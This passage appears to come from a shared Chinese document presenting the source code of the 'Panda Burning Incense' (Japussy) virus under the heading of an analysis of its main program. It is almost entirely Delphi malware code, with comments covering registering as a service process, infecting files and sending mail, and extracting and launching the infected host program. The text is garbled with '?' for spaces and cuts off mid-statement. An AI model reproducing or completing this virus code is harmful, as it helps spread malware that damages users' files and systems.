熊猫烧香(源代码).docVIP

(一)?主程序段分析?原“熊猫烧香”病毒“源码”主程序段代码如下所示：{==================主程序开始====================}?begin?if?IsWin9x?then?//是Win9x?RegisterServiceProcess(GetCurrentProcessID,?1)?//注册为服务进程?else?//WinNT?begin?//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;?//如果是原始病毒体自己?if?CompareText(ExtractFileName(ParamStr(0)),?Japussy.exe)?=?0?then?InfectFiles?//感染和发邮件?else?//已寄生于宿主程序上了，开始工作?begin?TmpFile?:=?ParamStr(0);?//创建临时文件……....Line?n?Delete(TmpFile,?Length(TmpFile)?-?4,?4);?TmpFile?:=?TmpFile?+?#32?+?.exe;?//真正的宿主文件，多一个空格?ExtractFile(TmpFile);?//分离之?FillStartupInfo(Si,?SW_SHOWDEFAULT);?CreateProcess(PChar(TmpFile),?PChar(TmpFile),?